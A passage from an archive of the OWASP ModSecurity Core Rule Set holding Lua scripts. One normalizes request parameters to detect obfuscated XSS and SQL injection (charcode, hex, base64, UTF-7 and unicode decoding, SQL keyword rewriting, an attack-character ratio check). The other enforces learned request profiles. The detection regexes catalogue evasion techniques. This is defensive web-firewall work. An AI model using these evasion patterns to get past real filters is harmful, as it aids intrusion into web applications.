(str, 16)) end )) end function urlencode(s) return (string.gsub (s, "%W", function (str) return string.format ("%%%02X", string.byte (str)) end )) end function strip_tags(h) local newstr = rex.gsub(h, "<(\/?)(\\w+)[^\>]*>", "%2", nil, 0, 0); return newstr end function hexdecode(s) s = string.gsub(s, "%%(%x%x)", function (h) return string.char(tonumber(h, 16)) end) return s end function sql_hexdecode(s) s = string.gsub(s, "(%x%x)", function (h) return string.char(tonumber(h, 16)) end) return s end --[[ Retrieve all ARGS parameters from ModSec urlDecodeUni, htmlEntityDecode and jsDecode can be used here with the initial extraction of data since they are able to decode any inline value vs. other transformation functions which will attempt to decode the entire string value. For those situations, we must create our own Lua functions ]] local args = {}; args = m.getvars("ARGS", {"none"}); -- Only run checks if ARGS are present if (#args == "0") then m.log(4, "# of ARGS: " ..#args.. "."); return nil; end -- Place ARGS data into key/value pairs for inspection for k,v in pairs(args) do name = v["name"]; value = v["value"]; original_value = value; m.log(4, "Arg Name: " ..name.. " and Arg Value: " ..value.. "."); --[[ Start Converter code ]] --[[ Make sure the value to normalize and monitor doesn't contain possibilities for a regex DoS.]] -- remove obvious repetition patterns value = rex.gsub(value, "(?:(.{2,})\\1{32,})|(?:[\-+=|@\\s]{128,})", "x", nil, 0, 0); m.log(4, "Remove repetition patterns: " .. value .. ""); --[[ Check for comments and erases them if available ]] -- check for existing comments if rex.match(value, "(?ms:(?:\\<!\-|\-\->|\\/\\*|\\*\\/|\\/\\/\\W*\\w+\\s*$)|(?:\-\-[^\\-]*\-))", 1) then converted = rex.gsub(value, "(?ms:(?:(?:<!)(?:(?:\-\-(?:[^\\-]*(?:\-[^\\-]+)*)\-\-\\s*)*)(?:>))|(?:(?:\\/\\*\\/*[^\\/\\*]*)+\\*\\/)|(?:\-\-[^\\-]*\-))", ";", nil, 0, 0); value = (value .. "\n" .. converted); m.log(4, "Check for Existing Comments: " .. value .. ""); end -- make sure inline comments are detected and converted correctly value = rex.gsub(value, "(?m:(<\\w+)\\/+(\\w+=?))", "%1/%2", nil, 0, 0); m.log(4, "Remove Inline Comments1: " .. value .. ""); value = rex.gsub(value, "(?m:[^\\\\:]\\/\\/(.*)$)", "/**/%1", nil, 0, 0); m.log(4, "Remove Inline Comments2: " .. value .. ""); --[[ Strip newlines ]] -- check for inline linebreaks value = rex.gsub(value, "\\\\(r|n|f|t|v)", ";", nil, 0, 0); m.log(4, "Check for inline linebreaks: " .. value .. ""); -- replace replacement characters regular spaces value = string.gsub(value, "�", ' ', nil, 0, 0); m.log(4, "Replace replacement chars: " .. value .. ""); -- convert real linebreaks value = rex.gsub(value, "(?m:[\\r\\n\\f\\t\\v])", " ", nil, 0, 0); m.log(4, "Convert real linebreaks: " .. value .. ""); --[[ Checks for common charcode pattern and decodes them ]] function convertFromJSCharcode(value) local matches, matches2, matches3; local changed = 0; local sum = 0; local chr = 0; local converted = ""; local tmp_value = value; -- check if value matches typical charCode pattern for line in rex.gmatch(tmp_value, "(?ms:(?:[\\d+-=\/\* ]+(?:\\s?,\\s?[\\d+-=\/\* ]+)){4,})", 0, 0) do if(matches ~= nil) then matches = matches .. "," .. line; else matches = line; end end if(matches ~= nil) then matches = rex.gsub(matches,"(\\s)", ""); matches = rex.gsub(matches,"(\\w+=)", ""); str = explode(",",matches); for i=1, table.getn(str) do chr = str[i]; if(string.len(str[i]) > 0) then chr = rex.gsub(chr,"(?s:\\W0)", ""); if(chr ~= nil) then for line2 in rex.gmatch(chr, "(\\d*[+-\/\* ]\\d+)",0, 0) do if(matches2 ~= nil) then matches2 = matches2 .. "" .. line2; else matches2 = line2; end end if( matches2 ~= nil )then for line3 in rex.split(matches2, "((\\W?\\d+))",0, 0) do if(line ~= nil) then changed = 1; sum = sum + tonumber(line3); end if(matches3 ~= nil) then matches3 = matches3 .. line3; else matches3 = line3; end end end if(changed == 1) then if(sum >= 20) then if(sum <= 127) then converted = converted .. string.char(sum); end end end if(changed == 0) then local num = 0; if(string.len(chr) > 0) then num = tonumber(chr); end converted = converted .. string.char(num); end end value = tmp_value .. "\n" .. converted; end end end end function convertFromJSCharcode_hex(value) -- check for hexadecimal charcode pattern local matches_hex = ""; local converted = ""; local tmp_value = value; for line in rex.gmatch(tmp_value, "(?ims:(?:(?:[\\\\]+\\w+\\s*){8,}))", 0, 0) do if(matches_hex ~= nil) then matches_hex = matches_hex .. "," .. line; else matches_hex = line; end end if(matches_hex ~= nil) then matches_hex = rex.gsub(matches_hex,"([ux])", ""); converted = ""; str = explode(",",matches_hex); for i=1, table.getn(str) do chr = str[i]; if(tonumber(chr) ~= 0) then converted = converted .. string.char(hex2dec(chr)); end end value = tmp_value .. "\n" .. converted; end print(value); return value; end function convertFromJSCharcode_oct(value) local matches_oct = ""; local converted_oct = ""; local tmp_value = value; -- check for octal charcode pattern for line in rex.gmatch(tmp_value, "(?ims:(?:(?:[\\\\]+\\d+){8,}))", 0, 0) do if(matches_oct ~= nil) then matches_oct = matches_oct .. "," .. line; else matches_oct = line; end end if(matches_oct ~= nil) then matches_oct = rex.gsub(matches_oct,"(\\s)", ""); str = explode(",",matches_oct); print(str); for i=1, table.getn(str) do chr = str[i]; if (tonumber(str[i]) ~= 0) then n = oct2dec(chr); n = dec2hex(n); if(n ~= 0)then str2 = string.char(hex2dec(n)); if(converted_oct ~= nil) then converted_oct = converted_oct .. str2; else converted_oct = str2; end end end end if(converted_oct ~= nil) then value = tmp_value .. "\n" .. converted_oct; else value = tmp_value; end end print(value); return value; end convertFromJSCharcode(value); m.log(4, "convertFromJSCharcode: " .. value .. ""); convertFromJSCharcode_hex(value); m.log(4, "convertFromJSCharcode_hex: " .. value .. ""); convertFromJSCharcode_oct(value); m.log(4, "convertFromJSCharcode_oct: " .. value .. ""); --[[ Eliminate JS regex modifiers ]] value = rex.gsub(value, "\/[gim]+", "\/", nil, 0, 0); m.log(4, "Eliminate JS regex modifiers: " .. value .. "."); --[[ Converts from hex/dec entities ]] -- deal with double encoded payload function htmlEntityDecode(value) value = rex.gsub(value, "&", "&", nil, 0, 0); local result; local tmp_value = value; for line in rex.gmatch(tmp_value, "(?ms:&#x?([\\w]{2}\\d?);?)", 0, 0) do if(line ~= nil) then if(result ~= nil) then result = result .. line; else result = line; end end end if(result ~= nil) then result = sql_hexdecode(result); value = tmp_value .. "\n" .. result; result = rex.gsub(result, ";;", ";", nil, 0, 0); else value = tmp_value; end print(result); return result; end htmlEntityDecode(value); m.log(4, "Converts from hex/dex entities: " .. value .. "."); -- normalize obfuscated protocol handlers value = rex.gsub(value, "(?ms:(?:j\\s*a\\s*v\\s*a\\s*s\\s*c\\s*r\\s*i\\s*p\\s*t\\s*)|(d\\s*a\\s*t\\s*a\\s*))", "javascript", nil, 0, 0); --[[ Normalize Quotes ]] -- normalize different quotes to " value = rex.gsub(value, "[\'\`\´\’\‘]", "\"", nil, 0, 0); m.log(4, "Normalize Quotes: " .. value .. "."); -- make sure harmless quoted strings don't generate false alerts value = rex.gsub(value, "^\"([^\"=\\!><~]+)\"$", "%1", nil, 0, 0); m.log(4, "Harmless Quotes: " .. value .. "."); --[[ Converts SQLHEX to plain text ]] local tmp_value = value; while true do sql_hex_value = rex.match(tmp_value, "(?im:0x([a-fA-F\\d]{2,}[a-fA-F\\d]*)+)"); if (sql_hex_value == nil) then break end m.log(4, "SQL Hex Data: " .. sql_hex_value .. "."); local sql_hex_decoded = sql_hexdecode(sql_hex_value); m.log(4, "SQL Hex Data Decoded: " .. sql_hex_decoded .. "."); tmp_value = rex.gsub(tmp_value, "(?im:0x([a-fA-F\\d]{2,}[a-fA-F\\d]*)+)", sql_hex_decoded, 1, 0, 0); m.log(4, "SQL Hex Data Normalized: " .. tmp_value .. "."); end value = rex.gsub(tmp_value, "(?m:0x\\d+)", "1", nil, 0, 0); --[[ Converts basic SQL keywords and obfuscations ]] value = rex.gsub(value, "(?ims:(?:IS\\s+null)|(LIKE\\s+null)|(?:(?:^|\\W)IN[\+\\s]*\([\\s\\d\"]+[^\(\)]*\)))", "\"=0", nil, 0, 0); value = rex.gsub(value, "(?ims:\\W+\\s*like\\s*\\W+)", "1\" OR \"1\"", nil, 0, 0); value = rex.gsub(value, "(?ims:null[,\"\\s])", ",0", nil, 0, 0); value = rex.gsub(value, "(?ims:\\d+\\.)", " 1", nil, 0, 0); value = rex.gsub(value, "(?ims:,null)", ",0", nil, 0, 0); value = rex.gsub(value, "(?ims:between|mod)", "or", nil, 0, 0); value = rex.gsub(value, "(?ims:and\\s+\\d+\.?\\d*)", "", nil, 0, 0); value = rex.gsub(value, "(?ims:\\s+and\\s+)", " or ", nil, 0, 0); value = rex.gsub(value, "(?ims:[^\\w,\(]NULL|\\\\N|TRUE|FALSE|UTC_TIME|LOCALTIME(?:STAMP)?|CURRENT_\\w+|BINARY|(?:(?:ASCII|SOUNDEX|FIND_IN_SET|MD5|R?LIKE)[\+\\s]*\\([^\(\)]+\\))|(?:\-+\\d))", "0", nil, 0, 0); value = rex.gsub(value, "(?ims:(?:NOT\\s+BETWEEN)|(?:IS\\s+NOT)|(?:NOT\\s+IN)|(?:XOR|\\WDIV\\W|\\WNOT\\W|<>|RLIKE(?:\\s+BINARY)?)|(?:REGEXP\\s+BINARY)|(?:SOUNDS\\s+LIKE))", "!", nil, 0, 0); value = rex.gsub(value, "\"\\s+\\d", "\"", nil, 0, 0); value = rex.gsub(value, "\\/(?i:\\d+|null)", "", nil, 0, 0); m.log(4, "Convert SQL Keywords and Obfuscations: " .. value .. "."); --[[ Detects nullbytes and controls chars via ord() ]] -- critical ctrl values value = rex.gsub(value, "(?i:cha?r\\((0|1|2|3|4|5|6|7|8|11|12|14|15|16|17|18|19|24|25|192|193|238|255)\\))", "%%00", nil, 0, 0); m.log(4, "Convert nullbytes and control chars via ord(): " .. value .. "."); -- take care for malicious unicode characters value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%E(?:2|3)\%8(?:0|1)\%(?:A|8|9)\\w|\%EF\%BB\%BF|\%EF\%BF\%BD)|(?:&#(?:65|8)\\d{3};?))", "", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%F0\%80\%BE))", ">", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%F0\%80\%BC))", "<", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%F0\%80\%A2))", "\"", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%F0\%80\%A7))", "\'", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%ff1c))", "<", nil, 0, 0)); value = rex.gsub(value, "(?i:(?:&[#x]*(200|820|200|820|zwn?j|lrm|rlm)\\w?;?))", "", nil, 0, 0); value = rex.gsub(value, "(?i:(?:&#(?:65|8)\\d{3};?)|(?:&#(?:56|7)3\\d{2};?)|(?:&#x(?:fe|20)\\w{2};?)|(?:&#x(?:d[c-f])\\w{2};?))", "", nil, 0, 0); value = rex.gsub(value, "(«|〈|<|‹|〈|⟨)", "<", nil, 0, 0); value = rex.gsub(value, "(»|〉|>|›|〉|⟩)", ">", nil, 0, 0); m.log(4, "Malicious unicode characters: " .. value .. ""); --[[ This method matches and translates base64 strings and fragments used in data URIs ]] tmp_value = value; while true do base64_value = rex.match(tmp_value, "([a-zA-Z0-9\+\/]{32,}={0,2})", 1, 0, 0); if (base64_value == nil) then break end m.log(4, "Base64 Data is: " .. base64_value .. "."); base64_value_decoded = base64decode(base64_value); m.log(4, "Base64 Data Decoded is: " .. base64_value_decoded .. "."); tmp_value = rex.gsub(tmp_value, "([a-zA-Z0-9\+\/]{32,}={0,2})", base64_value_decoded, 1, 0, 0); m.log(4, "Base64 Data Normalized: " .. tmp_value .. "."); end value = tmp_value; --[[ Detects nullbytes and controls chars via ord() ]] local mytable = {}; mytable = str_split(value); j = 1 while mytable[j] do if (string.byte(mytable[j]) >= 127) then mytable[j] = rex.gsub(mytable[j], ".*", " ", nil, 0, 0); end j = j + 1 end value = table.concat(mytable); m.log(4, "Detect nullbytes and control chars via ord(): " .. value .. "."); --[[ Strip XML patterns ]] converted = strip_tags(value); if (converted ~= value) then value = (value .. "\n" .. converted); m.log(4, "Strip XML patterns: " .. value .. "."); end --[[ This method converts JS unicode code points to regular characters ]] function convertFromJSUnicode(args) local new_value = ""; for line in rex.gmatch(args, "(?ims:\\\\u[0-9a-f]{4})", 0, 0) do hex = print(string.sub(line,3,6)) chr = string.char(hex2dec(string.sub(line,5,7))); if ( new_value == nil ) then new_value = chr; else new_value = new_value .. chr; end end if ( string.len(new_value) > 0 ) then value = new_value .. "\n\\u0001"; end end convertFromJSUnicode(value); m.log(4, "Convert JS unicode code points to regular chars: " .. value .. ""); --[[ Converts relevant UTF-7 tags to UTF-8 ]] value = rex.gsub(value,"\\+ACI\\-","\""); value = rex.gsub(value,"\\+ADw\\-","<"); value = rex.gsub(value,"\\+AD4\\-",">"); value = rex.gsub(value,"\\+AFs\\-","%["); value = rex.gsub(value,"\\+AF0\\-","]"); value = rex.gsub(value,"\\+AHs\\-","{"); value = rex.gsub(value,"\\+AH0\\-","}"); value = rex.gsub(value,"\\+AFw\\-","\\"); value = rex.gsub(value,"\\+ADs\\-",";"); value = rex.gsub(value,"\\+ACM\\-","#"); value = rex.gsub(value,"\\+ACY\\-","&"); value = rex.gsub(value,"\\+ACU\\-","%%"); value = rex.gsub(value,"\\+ACQ\\-","$"); value = rex.gsub(value,"\\+AD0\\-","="); value = rex.gsub(value,"\\+AGA\\-","`"); value = rex.gsub(value,"\\+ALQ\\-","\""); value = rex.gsub(value,"\\+IBg\\-","\""); value = rex.gsub(value,"\\+IBk\\-","\""); value = rex.gsub(value,"\\+AHw\\-","|"); value = rex.gsub(value,"\\+ACo\\-","*"); value = rex.gsub(value,"\\+AF4\\-","%^"); value = rex.gsub(value,"\\+ACIAPg\\-","\">"); value = rex.gsub(value,"\\+ACIAPgA8\\-","\">"); m.log(4, "Convert relevant UTF-7 tags to UTF-8: " .. value .. ""); --[[ Converts basic concatenations ]] function stripslashes(args) local value = rex.gsub(args,"(\\\\(.?))",""); return value; end function convertFromConcatenated(value) --normalize remaining backslashes if (value ~= rex.gsub(value,"((\\w)\\\\)", "%1")) then value = value .. rex.gsub(value,"((\\w)\\\\)", "%1"); end local compare = stripslashes(value); pattern = { "(?s:(?:<\/\\w+>\+<\\w+>))", "(?s:(?:\":\\d+[^\"\[]+\"))", "(?s:(?:\"?\"\+\\w+\+\"))", "(?s:(?:\"\\s*;[^\"]+\")|(?:\";[^\"]+:\\s*\"))", "(?s:(?:\"\\s*(?:\;|\\+).{8,18}:\\s*\"))", "(?s:(?:\";\\w+=)|(?:!\"\"&&\")|(?:~))", "(?s:(?:\"?\"\\+\"\"?\\+?\"?)|(?:;\\w+=\")|(?:\"[|&]{2,}))", "(?s:(?:\"\\s*\\W+\"))", "(?s:(?:\";\\w\\s*\\+=\\s*\\w?\\s*\"))", "(?s:(?:\"[|&;]+\\s*[^\|\&\\n]*[\|\&]+\\s*\"?))", "(?s:(?:\";\\s*\\w+\\W+\\w*\\s*[\|\&]*\"))", "(?s:(?:\"\\s*\"\\s*\.))", "((?:\\s*new\\s+\\w+\\s*[\\+\\\"\,]))", "((?:(?:^|\\s+)(?:do|else)\\s+))", "((?:(?:^|\\s+)(?:do|else)\\s+))", "((?:[{(]\\s*new\\s+\\w+\\s*[\)\}]))", "((?:(this|self)\.))", "((?:undefined))", "((?:in\\s+))" }; for i=1, table.getn(pattern) do -- strip out concatenations converted = rex.gsub(compare,pattern[i],""); end -- strip object traversal converted = rex.gsub(converted,"(\\w(\.\\w\()))", "%1"); -- normalize obfuscated method calls converted = rex.gsub(converted,"(\\)\\s*\+)", ")"); --convert JS special numbers converted = rex.gsub(converted,"(?ims:(?:\\(*[.\\d]e[\+\-]*[^a-z\\W]+\\)*)|(?:NaN|Infinity)\\W)", "1"); if (converted ~= nil) then if (compare ~= converted) then value = value .. "\n" .. converted; end end -- return value; end convertFromConcatenated(value); m.log(4, "Convert basic concatenations: " .. value .. ""); --[[ This method collects and decodes proprietary encoding types ]] function convertFromProprietaryEncodings(args) local value = args; --Xajax error reportings value = rex.gsub(value,"(?im:<!\[CDATA\[(.*)\]\]>)","%1", nil, 0, 0); --strip false alert triggering apostrophes value = rex.gsub(value,"(?m:(\\w)\"(s))", "%1%2"); --strip quotes within typical search patterns value = rex.gsub(value,"(^\"([^\"=\\!><~]+)\"/$)", "%1"); --OpenID login tokens value = rex.gsub(value,"({[\\w-]{8,9}\}(?:\{[\w=]{8}\}){2})", ""); --convert Content and \sdo\s to null value = rex.gsub(value,"(?s:Content|\\Wdo)", ""); --strip emoticons value = rex.gsub(value, "(?m:(?:\\s[:;]-[)\/PD]+)|(?:\\s;[)PD]+)|(?:\\s:[)PD]+)|-\.-|\^\^)", ""); --normalize separation char repetion value = rex.gsub(value,"(?m:([.+~=*_;\-])\1{2,})", "%1"); --normalize multiple single quotes value = rex.gsub(value,"(?m:/\"{2,})", "\""); --normalize quoted numerical values and asterisks value = rex.gsub(value,"(?m:\"(\\d+)\")", "%1"); --normalize pipe separated request parameters value = rex.gsub(value,"(?m:\|(\\w+=\\w+))", "&%1"); --normalize ampersand listings value = rex.gsub(value,"((\\w\\s)&\\s(\\w))", "%1%2"); --normalize escaped RegExp modifiers value = rex.gsub(value,"(\/\\\\(\\w))", "/%1"); end convertFromProprietaryEncodings(value); m.log(4, "convertFromProprietaryEncodings: " .. value .. ""); normalized_name = rex.gsub(name, "^(.*)$", "tx.%1_normalized"); m.setvar(normalized_name, value); --[[ This method is the centrifuge prototype ]] m.log(4, "Starting Centrifuge.. Arg Name = " ..name.. " and Arg Value = " ..value.. "."); threshold = 3.49; -- Examine each value if string.len(value) > 25 then local name = name; -- strip padding tmp_value = rex.gsub(value, "\\s{4}|==$", "", nil, 0, 0); m.log(4, "Strip Padding1 - name is: " .. name .. " and value is: " .. tmp_value .."."); tmp_value = rex.gsub(tmp_value, "\\s{4}|[\\p{L}\\d\+\-\=\,\.\%\(\)]{8,}", "aaa", nil, 0, 0); m.log(4, "Strip Padding2 - name is: " .. name .. " and value is: " .. tmp_value .."."); -- Check for the attack char ratio tmp_value = rex.gsub(tmp_value, "([\*\.\!\?\+\-])\\1{1,}", "%1", nil, 0, 0); tmp_value = rex.gsub(tmp_value, "\"[\\p{L}\\d\\s]+\"", "", nil, 0, 0); stripped_length = string.len(rex.gsub(tmp_value, "[\\d\\s\\p{L}\.\:\,\%\&\/\>\<\\-)\!\|]+", "", nil, 0, 0)); m.log(4, "stripped_length is: " .. stripped_length .. "."); overall_value = rex.gsub(tmp_value, "([\\d\\s\\p{L}\:\,\.]{3,})+", "aaa", nil, 0, 0); m.log(4, "overall_value is: " .. overall_value .. "."); overall_length = string.len(rex.gsub(overall_value, "\\s{2,}", "", nil, 0, 0)); m.log(4, "overall_length is: " .. overall_length .. "."); if ((stripped_length ~= 0) and (overall_length/stripped_length <= threshold)) then ratio_value = (overall_length/stripped_length); ratio_name = rex.gsub(name, "^(.*)$", "tx.%1_centrifuge_ratio"); m.setvar(ratio_name, ratio_value); m.log(4, "Threshold is: " .. threshold .. " and Ratio Value is: " .. ratio_value .. "."); end end -- Examine each value if string.len(value) > 40 then converted = value; mytable = str_split_unique(converted) j = 1 while mytable[j] do print(mytable[j]) j = j + 1 end converted = table.concat(mytable); m.log(4, "Unique/Sorted: " .. converted .. "."); -- Replace all non-special chars converted = rex.gsub(converted, "[\\w\\s\\p{L},\.:!]", ""); m.log(4, "Replace non-special chars: " .. converted .. "."); -- Normalize certain tokens converted = rex.gsub(converted, "(\\~|\\^|\\||\\*|\\%|\\&|\\/)", "+"); m.log(4, "Normalize certain tokens: " .. converted .. "."); converted = rex.gsub(converted, "(\\+|\\-)\\s*\\d+", "+"); m.log(4, "Normalize certain tokens: " .. converted .. "."); converted = rex.gsub(converted, "(\\(|\\)|\\[|\\]|\\{|\\})", "("); m.log(4, "Normalize certain tokens: " .. converted .. "."); converted = rex.gsub(converted, "(\\!|\\?|\\:|\=)", ":"); m.log(4, "Normalize certain tokens: " .. converted .. "."); converted = rex.gsub(converted, "[^:(+]", ""); m.log(4, "Normalize certain tokens: " .. converted .. "."); converted = string.gsub(converted, "\\", ""); m.log(4, "Normalize certain tokens: " .. converted .. "."); mytable = str_split(converted) table.sort(mytable); converted = table.concat(mytable); m.log(4, "Sorted: " .. converted .. "."); stripped_name = rex.gsub(name, "^(.*)$", "tx.%1_centrifuge_converted"); m.setvar(stripped_name, converted); end end if value ~= "." then return ("Normalized Payload: " .. name .. " = " .. value .. ""); else -- Nothing wrong found. return nil; end end ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/appsensor_request_exception_enforce.lua����������������0000775�0000000�0000000�00000026442�12164572564�0031364�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������function main() --[[ Enforce Request Method ]] EnforceRequestMethod() --[[ Enforce Number of Parameters/ARGS ]] EnforceNumOfArgs() --[[ Enforce Parameter Names ]] EnforceArgsNames() --[[ Enforce Parameter Lengths ]] EnforceArgsLength() --[[ Enforce Parameter Character Class ]] EnforceArgCharClass() m.log(4, "Ending Profile Enforcer Script") return nil end --[[ Begin Enforcement Functions ]] function EnforceArgCharClass() local Args = {} Args = m.getvars("ARGS", {"none"}) local EnforceArgCharClassEmail = m.getvar("RESOURCE.enforce_charclass_email") local EnforceArgCharClassDigits = m.getvar("RESOURCE.enforce_charclass_digits") local EnforceArgCharClassUrl = m.getvar("RESOURCE.enforce_charclass_url") local EnforceArgCharClassPath = m.getvar("RESOURCE.enforce_charclass_path") local EnforceArgCharClassFlag = m.getvar("RESOURCE.enforce_charclass_flag") local EnforceArgCharClassAlpha = m.getvar("RESOURCE.enforce_charclass_alphas") local EnforceArgCharClassAlphaNumeric = m.getvar("RESOURCE.enforce_charclass_alphanumeric") local EnforceArgCharClassSafeText = m.getvar("RESOURCE.enforce_charclass_safetext") for k,v in pairs(Args) do name = v["name"]; value = v["value"]; m.log(4, "CharClass Check - Arg Name: " ..name.. " and Value: " ..value.. "."); --[[ Check for Digits Character Class ]] if (EnforceArgCharClassDigits) then local CheckArgCharClassDigits = string.find(EnforceArgCharClassDigits, name) if (CheckArgCharClassDigits) then m.log(4, "Arg Name: " .. name .. " in Digits Enforcement list.") if string.match(value, "^%d+$") then m.log(4, "Parameter " ..name.. " payload matches digit class.") else m.log(4, "Parameter " ..name.. " payload does not match digit class.") m.setvar("TX." ..name.. "_digits_violation", value) m.setvar("TX.digits_violation_name", name) end end end --[[ Check for Email Character Class ]] if (EnforceArgCharClassEmail) then local CheckArgCharClassEmail = string.find(EnforceArgCharClassEmail, name) if (CheckArgCharClassEmail) then m.log(4, "Arg Name: " .. name .. " in Email Enforcement list.") if string.match(value, "^[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?$") then m.log(4, "Parameter " ..name.. " payload matches email class.") else m.log(4, "Parameter " ..name.. " payload does not match email class.") m.setvar("TX." ..name.. "_email_violation", value) m.setvar("TX.email_violation_name", name) end end end --[[ Check for URL Class ]] if (EnforceArgCharClassUrl) then local CheckArgCharClassUrl = string.find(EnforceArgCharClassUrl, name) if (CheckArgCharClassUrl) then m.log(4, "Arg Name: " .. name .. " in Url Enforcement list.") if string.match(value, "[A-Za-z]+://[A-Za-z0-9-_]+%.[A-Za-z0-9-_.]+/?") then m.log(4, "Parameter " ..name.. " payload matches url class.") else m.log(4, "Parameter " ..name.. " payload does not match url class.") m.setvar("TX." ..name.. "_url_violation", value) m.setvar("TX.url_violation_name", name) end end end --[[ Check for Path Class ]] if (EnforceArgCharClassPath) then local CheckArgCharClassPath = string.find(EnforceArgCharClassPath, name) if (CheckArgCharClassPath) then m.log(4, "Arg Name: " .. name .. " in Path Enforcement list.") if string.match(value, "[-a-zA-Z0-9/._]*/[-a-zA-Z0-9/._]*") then m.log(4, "Parameter " ..name.. " payload matches path class.") else m.log(4, "Parameter " ..name.. " payload does not match path class.") m.setvar("TX." ..name.. "_path_violation", value) m.setvar("TX.path_violation_name", name) end end end --[[ Check for Flag Parameter Class ]] if (EnforceArgCharClassFlag) then local CheckArgCharClassFlag = string.find(EnforceArgCharClassFlag, name) if (CheckArgCharClassFlag) then m.log(4, "Arg Name: " .. name .. " in Flag Enforcement list.") if string.match(value, "^$") then m.log(4, "Parameter " ..name.. " payload matches flag class.") else m.log(4, "Parameter " ..name.. " payload does not match flag class.") m.setvar("TX." ..name.. "_flag_violation", value) m.setvar("TX.flag_violation_name", name) end end end --[[ Check for Alpha/Letters Character Class ]] if (EnforceArgCharClassAlpha) then local CheckArgCharClassAlpha = string.find(EnforceArgCharClassAlpha, name) if (CheckArgCharClassAlpha) then m.log(4, "Arg Name: " .. name .. " in Alpha Enforcement list.") if string.match(value, "^%a+$") then m.log(4, "Parameter " ..name.. " payload matches alpha class.") else m.log(4, "Parameter " ..name.. " payload does not match alpha class.") m.setvar("TX." ..name.. "_alpha_violation", value) m.setvar("TX.alpha_violation_name", name) end end end --[[ Check for AlphaNumeric Character Class ]] if (EnforceArgCharClassAlphaNumeric) then local CheckArgCharClassAlphaNumeric = string.find(EnforceArgCharClassAlphaNumeric, name) if (CheckArgCharClassAlphaNumeric) then m.log(4, "Arg Name: " .. name .. " in AlphaNumeric Enforcement list.") if string.match(value, "^%w+$") then m.log(4, "Parameter " ..name.. " payload matches alphanumeric class.") else m.log(4, "Parameter " ..name.. " payload does not match alphanumeric class.") m.setvar("TX." ..name.. "_alphanumeric_violation", value) m.setvar("TX.alphanumeric_violation_name", name) end end end --[[ Check for SafeText Character Class ]] if (EnforceArgCharClassSafeText) then local CheckArgCharClassSafeText = string.find(EnforceArgCharClassSafeText, name) if (CheckArgCharClassSafeText) then m.log(4, "Arg Name: " .. name .. " in SafeText Enforcement list.") if string.match(value, "^[a-zA-Z0-9%s_%.%-]+$") then m.log(4, "Parameter " ..name.. " payload matches safetext class.") else m.log(4, "Parameter " ..name.. " payload does not match safetext class.") m.setvar("TX." ..name.. "_safetext_violation", value) m.setvar("TX.safetext_violation_name", name) end end end end end function EnforceArgsLength() local ArgsLength = {} ArgsLength = m.getvars("ARGS", {"none", "length"}) for k,v in pairs(ArgsLength) do name = v["name"]; value = v["value"]; value = tonumber(value); m.log(4, "Arg Name: " ..name.. " and Length: " ..value.. "."); local MinArgLength = tonumber(m.getvar("RESOURCE." .. name .. "_length_min", {"none"})) local MaxArgLength = tonumber(m.getvar("RESOURCE." .. name .. "_length_max", {"none"})) if ((value > MinArgLength) and (value < MaxArgLength)) then m.log(4, "Arg Name: " .. name .. " with Length: :" ..value.. " is within normal range.") elseif value < MinArgLength then m.log(4, "Arg Name: " .. name .. " Length " ..value.. " is below the normal range.") m.setvar("TX." .. name .. "_min_length_violation", value) m.setvar("TX.MinArgLength", MinArgLength) m.setvar("TX.MinArgLengthName", name) elseif value > MaxArgLength then m.log(4, "Arg Name: " .. name .. " Length " ..value.. " is above the normal range.") m.setvar("TX." .. name .. "_max_length_violation", value) m.setvar("TX.MaxArgLength", MaxArgLength) m.setvar("TX.MaxArgLengthName", name) end end end function EnforceArgsNames() local ArgsNames = {} ArgsNames = m.getvars("ARGS_NAMES", {"none"}) local EnforceArgsNames = m.getvar("RESOURCE.enforce_args_names") for k,v in pairs(ArgsNames) do name = v["name"]; value = v["value"]; m.log(4, "ArgsName: " ..value.. "."); local CheckArgsNames = string.find(EnforceArgsNames, value) if (CheckArgsNames) then m.log(4, "Arg Name: " .. value .. " is valid.") else m.log(4, "Args Name: " .. value .. " is not valid.") m.setvar("TX.args_names_violation", name) end end end function EnforceRequestMethod() local RequestMethod = m.getvar("REQUEST_METHOD", {"none"}) local EnforceRequestMethods = m.getvar("RESOURCE.enforce_request_methods") local EnforceMethods = string.find(EnforceRequestMethods, RequestMethod) if (EnforceMethods) then m.log(4, "Request Method " .. RequestMethod .. " already in Enforcement List.") else m.log(4, "Request Method: " .. RequestMethod .. " profile violation.") m.setvar("TX.request_method_violation", "1") end end function EnforceNumOfArgs() local ARGS = {} local ARGS = m.getvars("ARGS", {"none"}) local NumOfArgs = tonumber(#ARGS) local MinNumOfArgs = tonumber(m.getvar("RESOURCE.MinNumOfArgs", {"none"})) local MaxNumOfArgs = tonumber(m.getvar("RESOURCE.MaxNumOfArgs", {"none"})) local EnforceNumOfArgs = m.getvar("RESOURCE.enforce_num_of_args") if ((NumOfArgs > MinNumOfArgs) and (NumOfArgs < MaxNumOfArgs)) then m.log(4, "Number of ARGS is within normal range.") elseif NumOfArgs < MinNumOfArgs then m.log(4, "Number of ARGS is less than MinNumOfArgs: " .. MinNumOfArgs .. ".") m.setvar("TX.MIN_NUM_ARGS_VIOLATION", "1") m.setvar("TX.NUM_OF_ARGS", NumOfArgs) elseif NumOfArgs > MaxNumOfArgs then m.log(4, "Number of ARGS is more than MxxiaxinNumOfArgs: " .. MaxNumOfArgs .. ".") m.setvar("TX.MAX_NUM_ARGS_VIOLATION", "1") m.setvar("TX.NUM_OF_ARGS", NumOfArgs) end end ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/appsensor_request_exception_profile.lua����������������0000775�0000000�0000000�00000120376�12164572564�0031404�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������function main() --[[ Global Vars ]] --[[ Import Profile Learning Thresholds 